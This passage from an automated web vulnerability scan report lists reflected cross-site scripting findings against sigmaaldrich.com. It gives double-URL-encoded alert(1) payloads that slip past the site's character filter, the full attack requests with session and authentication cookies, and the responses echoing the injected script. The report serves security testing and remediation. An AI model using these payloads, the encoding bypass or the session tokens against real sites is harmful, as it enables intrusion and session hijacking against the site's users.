Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:17 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countriesd7986";alert(1)//31940e1e566/united-states/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.269. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 845dd%2522%253balert%25281%2529%252f%252f1283c962a59 was submitted in the REST URL parameter 4. This input was echoed as 845dd";alert(1)//1283c962a59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states845dd%2522%253balert%25281%2529%252f%252f1283c962a59/press-releases/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:22 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states845dd";alert(1)//1283c962a59/press-releases/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.270. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 33225%2522%253balert%25281%2529%252f%252f86066d7a53a was submitted in the REST URL parameter 5. This input was echoed as 33225";alert(1)//86066d7a53a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases33225%2522%253balert%25281%2529%252f%252f86066d7a53a/safc-corporate-logo HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:27 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases33225";alert(1)//86066d7a53a/safc-corporate-logo","E404") ;
   </script>
...[SNIP]...

1.271. http://www.sigmaaldrich.com/etc/medialib/countries/united-states/press-releases/safc-corporate-logo [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/countries/united-states/press-releases/safc-corporate-logo

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3c67%2522%253balert%25281%2529%252f%252f21c09e05426 was submitted in the REST URL parameter 6. This input was echoed as e3c67";alert(1)//21c09e05426 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 6 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/countries/united-states/press-releases/safc-corporate-logoe3c67%2522%253balert%25281%2529%252f%252f21c09e05426 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:38 GMT
Content-Length: 28975
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/countries/united-states/press-releases/safc-corporate-logoe3c67";alert(1)//21c09e05426","E404") ;
   </script>
...[SNIP]...

1.272. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 971b0%2522%253balert%25281%2529%252f%252f4074737e8c2 was submitted in the REST URL parameter 1. This input was echoed as 971b0";alert(1)//4074737e8c2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc971b0%2522%253balert%25281%2529%252f%252f4074737e8c2/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:39 GMT
Content-Length: 28996
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc971b0";alert(1)//4074737e8c2/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf","E404") ;
   </script>
...[SNIP]...

1.273. http://www.sigmaaldrich.com/etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c978a%2522%253balert%25281%2529%252f%252f673593163e9 was submitted in the REST URL parameter 2. This input was echoed as c978a";alert(1)//673593163e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialibc978a%2522%253balert%25281%2529%252f%252f673593163e9/docs/Aldrich/Brochure/al_chemfile_v5_n1.Par.0001.File.tmp/al_chemfile_v5_n1.pdf HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
